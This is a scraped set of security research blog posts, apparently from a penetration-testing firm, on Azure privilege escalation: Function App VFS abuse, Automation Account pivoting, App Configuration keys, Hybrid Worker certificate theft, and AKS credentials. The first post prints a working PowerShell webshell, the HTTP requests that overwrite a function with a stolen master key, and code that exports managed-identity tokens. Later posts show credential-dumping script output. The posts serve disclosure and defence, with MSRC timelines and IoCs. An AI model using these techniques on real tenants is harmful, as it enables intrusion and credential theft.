"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function 
processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use BurpSuite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.
ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the Tag as the "If-Match" Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/
run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed 
a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 
'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=
whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=
$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get 
-Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} 
-Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let's recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  1. Abuse the undocumented VFS API to read arbitrary files from the containers.
  1. Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
  1. Using the Linux container, read the process environmental variables. 
  1. Use the variables to access configuration information in a SAS token URL. 
  1. Decrypt the configuration information with the variables. 
  1. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

[post_title] => Escalating Privileges with Azure Function Apps [post_excerpt] => Explore how undocumented APIs used by the Azure Function Apps Portal menu allowed for directory traversal on the Function App containers. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-function-apps [to_ping] => [pinged] => [post_modified] => 2023-03-23 08:24:38 [post_modified_gmt] => 2023-03-23 13:24:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29749 [menu_order] => 71 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 29393 [post_author] => 10 [post_date] => 2023-02-16 09:00:00 [post_date_gmt] => 2023-02-16 15:00:00 [post_content] =>

Intro 

Azure Automation Accounts are a frequent topic on the NetSPI technical blog. To the point that we compiled our research into a presentation for the DEFCON 30 cloud village and the Azure Cloud Security Meetup Group. We're always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.

Passing the Identity in Azure Active Directory 

As a primer, an Azure Active Directory (AAD) identity (User, App Registration, or Managed Identity) can have a role (Contributor) on an Automation Account that allows them to modify the account. The Automation Account can have attached identities that allow the account to authenticate to Azure AD as those identities. Once authenticated as the identity, the Automation Account runbook code will then run any Azure commands in the context of the identity. If that Identity has additional (or different) permissions from those of the AAD user that is writing the runbook, the AAD user can abuse those permissions to escalate or move laterally.

Simply put, Contributor on the Automation Account allows an attacker to be any identity attached to the Automation Account. These attached identities can have additional privileges, leading to a privilege escalation for the original Contributor account. 

Available Identities for Azure Automation Accounts 

There are two types of identities available for Automation Accounts: Run As Accounts and Managed Identities. The Run As Accounts will be deprecated on September 30, 2023, but they have been a source of several issues since they were introduced. When initially created, a Run As Account will be granted the Contributor role on the subscription it is created in.  

These accounts are also App Registrations in Azure Active Directory that use certificates for authentication. These certificates can be extracted from Automation Accounts with a runbook and used for gaining access to the Run As Account. This is also helpful for persistence, as App Registrations typically don’t have conditional access restrictions applied. 

For more on Azure Privilege Escalation using Managed Identities, check out this blog.

Screenshot of the Run As account type, one of two identities available for Azure Automation Accounts.

Managed Identities are the currently recommended option for using an execution identity in Automation Account runbooks. Managed Identities can either be system-assigned or user-assigned. System-assigned identities are tied to the resource that they are created for and cannot be shared between resources. User-assigned Managed Identities are a subscription level resource that can be shared across resources, which is handy for situations where resources, like multiple App Services applications, require shared access to a specific resource (Storage Account, Key Vault, etc.). Managed Identities are a more secure option for Automation Account Identities, as their access is temporary and must be generated from the attached resource.

A description of a system-assigned identity in Azure Automation Account.

Since Automation Accounts are frequently used to automate actions in multiple subscriptions, they are often granted roles in other subscriptions, or on higher level management groups. As attackers, we like to look for resources in Azure that can allow for pivoting to other parts of an Azure tenant. To help in automating this enumeration of the identity privileges, we put together a PowerShell script. 

Automating Privilege Enumeration 

The Get-AzAutomationConnectionScope function in MicroBurst is a relatively simple PowerShell script that uses the following logic:

  • Get a list of available subscriptions 
    • For each selected subscription 
      • Get a list of available connections (Run As or Managed Identity) 
      • Build the Automation Account runbook to authenticate as the connection, and list available subscriptions and available Key Vaults 
      • Upload and run the runbook 
      • Retrieve the output and return it
      • Delete the runbook 

In general, we are going to create a "malicious" automation runbook that goes through all the available identities in the Automation Account to tell us the available subscriptions and Key Vaults. Since the Key Vaults utilize a secondary access control mechanism (Access Policies), the script will also review the policies for each available Key Vault and report back any that have entries for our current identity. While a Contributor on a Key Vault can change these Access Policies, it is helpful to know which identities already have Key Vault access. 

The usage of the script is simple. Just authenticate to the Az PowerShell module (Connect-AzAccount) as a Contributor on an Automation Account and run “Get-AzAutomationConnectionScope”. The verbose flag is very helpful here, as runbooks can take a while to run, and the verbose status update is nice.

PowerShell script for automating the enumeration of identity privileges.

Note that this will also work for cross-tenant Run As connections. As a proof of concept, we created a Run As account in another tenant (see “Automation Account Connection – dso” above), uploaded the certificate and authentication information (Application ID and Tenant) to our Automation Account, and the connection was usable with this script. This can be a convenient way to pivot to other tenants that your Automation Account is responsible for. That said, it's rare for us to see a cross-tenant connection like that.

As a final note on the script, the "Classic Run As" connections in an older Automation Account will not work with this script. They may show up in your output, but they require additional authentication logic in the runbook, and given the low likelihood of their usage, we've opted to avoid adding the logic in for those connections. 

Indicators of Compromise 

To help out the Azure defenders, here is a rough outline on how this script would look in a subscription/tenant from an incident response perspective: 

  1. Initial Account Authentication 
    a.   User/App Registration authenticates via the Az PowerShell cmdlets 
  1. Subscriptions / Automation Accounts Enumerated 
    a.   The script has you select an available subscription to test, then lists the available Automation Accounts to select from 
  1. Malicious Runbook draft is created in the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/write
    b.   Microsoft.Automation/automationAccounts/runbooks/draft/write 
  1. Malicious Runbook is published to the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/publish/action 
  1. Malicious Runbook is executed as a job
    a.   Microsoft.Automation/automationAccounts/jobs/write 
  1. Run As connections and/or Managed Identities should show up as authentication events 
  1. Malicious Runbook is deleted from the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/delete 

Providing the full rundown is a little beyond the scope of this blog, but Lina Lau (@inversecos) has a great blog on detections for Automation Accounts that covers a persistence technique I previously outlined in a previous article titled, Maintaining Azure Persistence via Automation Accounts. Lina’s blog should also cover most of the steps that we have outlined above. 

For additional detail on Automation Account attack paths, take a look at Andy Robbins’ blog, Managed Identity Attack Paths, Part 1: Automation Accounts

Conclusion 

While Automation Account identities are often a necessity for automating actions in an Azure tenant, they can allow a user (with the correct role) to abuse the identity permissions to escalate and/or pivot to other subscriptions.

The function outlined in this blog should be helpful for enumerating potential pivot points from an existing Automation Account where you have Contributor access. From here, you could create custom runbooks to extract credentials, or pivot to Virtual Machines that your identity has access to. Alternatively, defenders can use this script to see the potential blast radius of a compromised Automation Account in their subscriptions. 

Ready to improve your Azure security? Explore NetSPI’s Azure Cloud Penetration Testing solutions. Or checkout these blog posts for more in-depth research on Azure Automation Accounts:  

[post_title] => Pivoting with Azure Automation Account Connections [post_excerpt] => Discover a helpful function for enumerating potential pivot points from an existing Azure Automation Account with Contributor level access. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-automation-account-connections [to_ping] => [pinged] => [post_modified] => 2023-02-15 11:38:52 [post_modified_gmt] => 2023-02-15 17:38:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29393 [menu_order] => 83 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 28955 [post_author] => 10 [post_date] => 2022-12-08 10:00:00 [post_date_gmt] => 2022-12-08 16:00:00 [post_content] =>

Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.

TL;DR

The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.

What are App Configurations?

The App Configuration service is a very simple service. Provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a really simple way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.

Gathering Access Keys

Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks. 

Regardless of the type of key that an attacker acquires, this can lead to access the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.

To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/” action.

From the portal, you can copy out the connection string directly from the “Access keys” menu.

An example of the portal in an ap configuration service.

This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.

Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.

An example of an app configuration access key found in public data sources.

Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.

Using the Keys

Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.

This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.

The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.

A list of configuration values from the Get-AzAppConfiguration function.

In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.

IoCs

Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:

  • Azure Activity Log - List Access Keys
    • Category – “Administrative”
    • Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
    • Status – “Started”
    • Caller – < UPN of account listing keys>
An example of an app configuration audit log, capturing details of the account used to access data.
  • App Configuration Service Logs

Conclusions

We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string and defenders areas to look at to help secure their configuration environments.

For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.

Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.

[post_title] => How to Gather Azure App Configurations [post_excerpt] => Learn how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-azure-app-configurations [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:18:32 [post_modified_gmt] => 2023-03-16 14:18:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28955 [menu_order] => 114 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 27487 [post_author] => 10 [post_date] => 2022-03-17 08:00:00 [post_date_gmt] => 2022-03-17 13:00:00 [post_content] =>

On the NetSPI blog, we often focus on Azure Automation Accounts. They offer a fair amount of attack surface area during cloud penetration tests and are a great source for privilege escalation opportunities.  

During one of our recent Azure penetration testing assessments, we ran into an environment that was using Automation Account Hybrid Workers to run automation runbooks on virtual machines. Hybrid Workers are an alternative to the traditional Azure Automation Account container environment for runbook execution. Outside of the “normal” runbook execution environment, automation runbooks need access to additional credentials to interact with Azure resources. This can lead to a potential privilege escalation scenario that we will cover in this blog.

TL;DR

Azure Hybrid Workers can be configured to use Automation Account “Run as” accounts, which can expose the credentials to anyone with local administrator access to the Hybrid Worker. Since “Run as” accounts are typically subscription contributors, this can lead to privilege escalation from multiple Azure Role-Based Access Control (RBAC) roles.

What are Azure Hybrid Workers?

For those that need more computing resources (CPU, RAM, Disk, Time) to run their Automation Account runbooks, there is an option to add Hybrid Workers to an Automation Account. These Hybrid Workers can be Azure Virtual Machines (VMs) or Arc-enabled servers, and they allow for additional computing flexibility over the normal limitations of the Automation Account hosted environment. Typically, I’ve seen Hybrid Workers as Windows-based Azure VMs, as that’s the easiest way to integrate with the Automation Account runbooks. 

Add Hybrid Workers to an Automation Account

In this article, we’re going to focus on instances where the Hybrid Workers are Windows VMs in Azure. They’re the most common configuration that we run into, and the Linux VMs in Azure can’t be configured to use the “Run as” certificates, which are the target of this blog.

The easiest way to identify Automation Accounts that use Hybrid Workers is to look at the “Hybrid worker groups” section of an Automation Account in the portal. We will be focusing on the “User” groups, versus the “System” groups for this post. 

The easiest way to identify Automation Accounts that use Hybrid Workers is to look at the “Hybrid worker groups” section of an Automation Account in the portal.

Additionally, you can use the Az PowerShell cmdlets to identify the Hybrid Worker groups, or you can enumerate the VMs that have the “HybridWorkerExtension” VM extension installed. I’ve found this last method is the most reliable for finding potentially vulnerable VMs to attack.

Additional Azure Automation Accounts Research:

Running Jobs on the Workers

To run jobs on the Hybrid Worker group, you can modify the “Run settings” in any of your runbook execution options (Schedules, Webhook, Test Pane) to “Run on” the Hybrid Worker group.

To run jobs on the Hybrid Worker group, you can modify the “Run settings” in any of your runbook execution options (Schedules, Webhook, Test Pane) to “Run on” the Hybrid Worker group.

When the runbook code is executed on the Hybrid Worker, it is run as the “NT AUTHORITY\SYSTEM” account in Windows, or “root” in Linux. If an Azure AD user has a role (Automation Contributor) with Automation Account permissions, and no VM permissions, this could allow them to gain privileged access to VMs.

We will go over this in greater detail in part two of this blog, but Hybrid Workers utilize an undocumented internal API to poll for information about the Automation Account (Runbooks, Credentials, Jobs). As part of this, the Hybrid Workers are not supposed to have direct access to the certificates that are used as part of the traditional “Run As” process. As you will see in the following blog, this isn’t totally true.

To make up for the lack of immediate access to the “Run as” credentials, Microsoft recommends exporting the “Run as” certificate from the Automation Account and installing it on each Hybrid Worker in the group of workers. Once installed, the “Run as” credential can then be referenced by the runbook, to authenticate as the app registration.

If you have access to an Automation Account, keep an eye out for any lingering “Export-RunAsCertificateToHybridWorker” runbooks that may indicate the usage of the “Run as” certificates on the Hybrid Workers.

If you have access to an Automation Account, keep an eye out for any lingering “Export-RunAsCertificateToHybridWorker” runbooks that may indicate the usage of the “Run as” certificates on the Hybrid Workers.

The issue with installing these “Run As” certificates on the Hybrid Workers is that anyone with local administrator access to the Hybrid Worker can extract the credential and use it to authenticate as the “Run as” account. Given that “Run as” accounts are typically configured with the Contributor role at the subscription scope, this could result in privilege escalation.

Extracting “Run As” Credentials from Hybrid Workers

We have two different ways of accessing Windows VMs in Azure, direct authentication (Local or Domain accounts) and platform level command execution (VM Run Command in Azure). Since there are a million different ways that someone could gain access to credentials with local administrator rights, we won’t be covering standard Windows authentication. Instead, we will briefly cover the multiple Azure RBAC roles that allow for various ways of command execution on Azure VMs.

Affected Roles:

Where noted above (VM Extension Rights), the VM Extension command execution method comes from the following NetSPI blog: Attacking Azure with Custom Script Extensions.

Since the above roles are not the full Contributor role on the subscription, it is possible for someone with one of the above roles to extract the “Run as” credentials from the VM (see below) to escalate to a subscription Contributor. This is a somewhat similar escalation path to the one that we previously called out for the Log Analytics Contributor role.

Exporting the Certificate from the Worker

As a local administrator on the Hybrid Worker VM, it’s fairly simple to export the certificate. With Remote Desktop Protocol (RDP) access, we can just manually go into the certificate manager (certmgr), find the “Run as” certificate, and export it to a pfx file.

With Remote Desktop Protocol (RDP) access, we can just manually go into the certificate manager (certmgr), find the “Run as” certificate, and export it to a pfx file.

At this point we can copy the file from the Hybrid Worker to use for authentication on another system. Since this is a bit tedious to do at scale, we’ve automated the whole process with a PowerShell script.

Automating the Process

The following script is in the MicroBurst repository under the “Az” folder:

https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzHybridWorkerExtraction.ps1

This script will enumerate any running Windows virtual machines configured with the Hybrid Worker extension and will then run commands on the VMs (via Invoke-AzVMRunCommand) to export the available private certificates. Assuming the Hybrid Worker is only configured with one exportable private certificate, this will return the certificate as a Base64 string in the run command output.

PS C:\temp\hybrid> Invoke-AzHybridWorkerExtraction -Verbose
VERBOSE: Logged In as kfosaaen@notarealdomain.com
VERBOSE: Getting a list of Hybrid Worker VMs
VERBOSE: 	Running extraction script on the HWTest virtual machine
VERBOSE: 		Looking for the attached App Registration... This may take a while in larger environments
VERBOSE: 			Writing the AuthAs script
VERBOSE: 		Use the C:\temp\HybridWorkers\AuthAsNetSPI_tester_[REDACTED].ps1 script to authenticate as the NetSPI_sQ[REDACTED]g= App Registration
VERBOSE: 	Script Execution on HWTest Completed
VERBOSE: Run as Credential Dumping Activities Have Completed

The script will then write this Base64 certificate data to a file and use the resulting certificate thumbprint to match against App Registration credentials in Azure AD. This will allow the script to find the App Registration Client ID that is needed to authenticate with the exported certificate.

Finally, this will create an “AuthAs” script (noted in the output) that can be used to authenticate as the “Run as” account, with the exported private certificate.

PS C:\temp\hybrid> ls | select Name, Length
Name                                        Length
----                                        ------
AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1   1018
NetSPI_tester_[Redacted_Sub_ID].pfx         2615

This script can be run with any RBAC role that has VM “Run Command” rights on the Hybrid Workers to extract out the “Run as” credentials.

Authenticating as the “Run As” Account

Now that we have the certificate, we can use the generated script to authenticate to the subscription as the “Run As” account. This is very similar to what we do with exporting credentials in the Get-AzPasswords function, so this may look familiar.

PS C:\temp\hybrid> .\AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1
   PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint                                Subject
----------                                -------
BDD023EC342FE04CC1C0613499F9FF63111631BB  DC=NetSPI_tester_[Redacted_Sub_ID]

Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud], [AzureUSGovernment, AzureUSGovernment]}
Context      : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp\hybrid> (Get-AzContext).Account                                                                               
Id                    : 52[REDACTED]57
Type                  : ServicePrincipal
Tenants               : {47[REDACTED]35}
Credential            :
TenantMap             : {}
CertificateThumbprint : BDD023EC342FE04CC1C0613499F9FF63111631BB
ExtendedProperties    : {[Subscriptions, d4[REDACTED]b2], [Tenants, 47[REDACTED]35], [CertificateThumbprint, BDD023EC342FE04CC1C0613499F9FF63111631BB]}

Alternative Options

Finally, any user with the ability to run commands as “NT AUTHORITY\SYSTEM” on the Hybrid Workers is also able to assume the authenticated Azure context that results from authenticating (Connect-AzAccount) to Azure while running a job as a Hybrid Worker. 

This would result in users being able to run Az PowerShell module functions as the “Run as” account via the Azure “Run command” and “Extension” features that are available to many of the roles listed above. Assuming the “Connect-AzAccount” function was previously used with a runbook, an attacker could just use the run command feature to run other Az module functions with the “Run as” context.

Additionally, since the certificate is installed on the VM, a user could just use the certificate to directly authenticate from the Hybrid Worker, if there was no active login context.

Summary

In conjunction with the issues outlined in part two of this blog, we submitted our findings to MSRC.

Since this issue ultimately relies on an Azure administrator giving a user access to specific VMs (the Hybrid Workers), it’s considered a user misconfiguration issue. Microsoft has updated their documentation to reflect the potential impact of installing the “Run as” certificate on the VMs. Additionally, you could also modify the certificate installation process to mark the certificates as “non-exportable” to help protect them.

Note: Microsoft has updated their documentation to reflect the potential impact of installing the “Run as” certificate on the VMs.

We would recommend against using “Run as” accounts for Automation Accounts and instead switch to using managed identities on the Hybrid Worker VMs.

Stay tuned to the NetSPI technical blog for the second half of this series that will outline how we were able to use a Reader role account to extract credentials and certificates from Automation Accounts. In subscriptions where Run As accounts were in use, this resulted in a Reader to Contributor privilege escalation.

Prior Work

While we were working on these blogs, the Azsec blog put out the “Laterally move by abusing Log Analytics Agent and Automation Hybrid worker” post that outlines some similar techniques to what we’ve outlined above. Read the post to see how they make use of Log Analytics to gain access to the Hybrid Worker groups.

[post_title] => Abusing Azure Hybrid Workers for Privilege Escalation – Part 1 [post_excerpt] => In this cloud penetration testing blog, learn how to abuse Azure Hybrid Workers for privilege escalation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => abusing-azure-hybrid-workers-for-privilege-escalation [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:20:54 [post_modified_gmt] => 2023-03-16 14:20:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27487 [menu_order] => 234 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 27255 [post_author] => 10 [post_date] => 2022-01-27 09:00:00 [post_date_gmt] => 2022-01-27 15:00:00 [post_content] =>

As more applications move to a container-based model, we are running into more instances of Azure Kubernetes Services (AKS) being used in Azure subscriptions. The service itself can be complicated and have a large attack surface area. In this post we will focus on how to extract credentials from the AKS service in Azure, using the Contributor role permissions on an AKS cluster.

While we won’t explain how Kubernetes works, we will use some common terms throughout this post. It may be helpful to have this Kubernetes glossary open in another tab for reference. Additionally, we will not cover how to collect the Kubernetes “Secrets” from the service or how to review pods/containers for sensitive information. We’ll save those topics for a future post.

What is Azure Kubernetes Service (AKS)?

In the simplest terms, the AKS service is an Azure resource that allows you to run a Kubernetes cluster in Azure. When created, the AKS cluster resource consists of sub-resources (in a special resource group) that support running the cluster. These sub-resources, and attached cluster, allow you to orchestrate containers and set up Kubernetes workloads. As a part of the orchestration process, the cluster needs to be assigned an identity (a Service Principal or a Managed Identity) in the Azure tenant. 

Service Principal versus Managed Identity

When provisioning an AKS cluster, you will have to choose between authenticating with a Service Principal or a System-assigned Managed Identity. By default, the Service Principal that is assigned to the cluster will get the ACRPull role assigned at the subscription scope level. While it’s not a guarantee, by using an existing Service Principal, the attached identity may also have additional roles already assigned in the Azure tenant.

In contrast, a newly created System-assigned Managed Identity on an AKS cluster will not have any assigned roles in a subscription. To further complicate things, the “System-assigned” Managed Identity is actually a “User-assigned” Managed Identity that’s created in the new Resource Group for the Virtual Machine Scale Set (VMSS) cluster resources. There’s no “Identity” menu in the AKS portal blade, so it’s my understanding that the User-assigned Managed Identity is what gets used in the cluster. Each of these authentication methods have their benefits, and we will have different approaches to attacking each one.

Cluster Infrastructure

In order to access the credentials (Service Principal or Managed Identity) associated with the cluster, we will need to execute commands on the cluster. This can be done by using an authenticated kubectl session (which we will explore in the Gathering kubectl Credentials section), or by executing commands directly on the VMSS instances that support the cluster. 

When a new cluster is created in AKS, a new resource group is created in the subscription to house the supporting resources. This new resource group is named after the resource group that the AKS resource was created under, and the name of the cluster. 

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

This resource group will contain the VMSS, some supporting resources, and the Managed Identities used by the cluster.

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

Gathering Service Principal Credentials

First, we will cover clusters that are configured with a Service Principal credential. As part of the configuration process, Azure places the Service Principal credentials in cleartext into the “/etc/kubernetes/azure.json” file on the cluster. According to the Microsoft documentation, this is by design, and is done to allow the cluster to use the Service Principal credentials. There are legitimate uses of these credentials, but it always feels wrong finding them available in cleartext.

